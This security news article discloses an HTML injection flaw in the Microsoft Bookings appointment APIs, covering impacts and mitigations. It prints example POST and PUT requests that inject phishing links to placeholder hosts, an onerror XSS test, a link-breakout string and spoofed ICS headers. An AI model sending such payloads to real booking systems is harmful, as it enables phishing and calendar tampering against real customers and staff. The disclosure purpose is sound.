Security researchers have uncovered a significant vulnerability in Microsoft Bookings, the scheduling tool integrated with Microsoft 365.
The flaw, discovered through technical analysis of the service’s appointment creation and update APIs, allows unauthorized modification of meeting details, posing risks such as phishing, calendar manipulation, and information leakage.
Technical Details and Vulnerability Overview
The vulnerability arises from inadequate input validation and sanitization in several key fields used by Microsoft Bookings.
.png
)
When a user, either a legitimate customer or a malicious actor, creates or modifies a meeting, the following fields in the API are not sufficiently filtered:
- appointment.serviceNotes
- appointment.additionalNotes
- appointment.body.content
These fields accept arbitrary HTML, which is subsequently embedded in confirmation emails, Teams invitations, and attached ICS (calendar) files.
Example: Exploiting the Booking API
1. Appointment Creation (POST Request)
POST /BookingsService/api/V1/bookingBusinessesc2/EXAMPLETestseite@bookings.example.de/appointments?app=BookingsC2&n=11 HTTP/1.1
Host: outlook.office365.com
Content-Type: application/json
{
 "appointment": {
   "serviceNotes": "<b style='color:red'>Injected Note!</b>",
   "body": {
     "contentType": "html",
     "content": "<a href='https://phishing-site.com'>Join meeting here</a>"
   },
  ...
 }
}
This request will cause the injected HTML to appear in all meeting-related emails and invites.
2. Appointment Modification via Rescheduling (PUT Request)
PUT /BookingsService/api/V1/bookingBusinessesc2/EXAMPLETestseite@bookings.example.de/appointments/[AppointmentID]?app=BookingsC2&n=16 HTTP/1.1
Host: outlook.office365.com
Content-Type: application/json
{
 "appointment": {
   "serviceNotes": "<a href='https://malicious.com'>Click me!</a>",
   "joinWebUrl": "https://legit.com\"></a><a href=\"https://evil.com\" style=\"color:red;\">Malicious Link</a><!--",
   "body": {
     "contentType": "html",
     "content": "<img src='x' onerror='alert(1)'>"
   },  Â
   ...
 }
}This can result in confirmation emails and calendar invites embedding unauthorized or malicious content, with ICS files manipulated via custom headers like X-ALT-DESC and altered ORGANIZER fields:
X-ALT-DESC;FMTTYPE=text/html:<a href="https://phishing-site.com"><h1>Phishing here!</h1></a>
ORGANIZER;CN=Attacker:mailto:attacker@example.com- Phishing Attacks: Malicious links can be presented as legitimate meeting links, easily tricking users.
- Calendar Tampering: Attackers can alter timings, extend durations, or add/remover attendees, disrupting business operations.
- Sensitive Data Exposure: Notes meant for staff only could be leaked to customers or third parties through repeated edits.
- Denial of Service: By booking extremely long meetings, attackers can exhaust staff calendars, blocking new appointments.
Microsoft has enacted mitigations, but organizations should:
- Scrutinize booking parameters for unexpected content
- Educate staff on phishing risks from calendar invites
- Monitor for unusual booking activity
This vulnerability underscores the importance of robust server-side validation, especially in customer-facing scheduling tools.
Organizations relying on Microsoft Bookings should remain vigilant and keep systems up-to-date to protect against evolving threats.
Setting Up SOC Team? – Download Free Ultimate SIEM Pricing Guide (PDF) For Your SOC Team -> Free Download
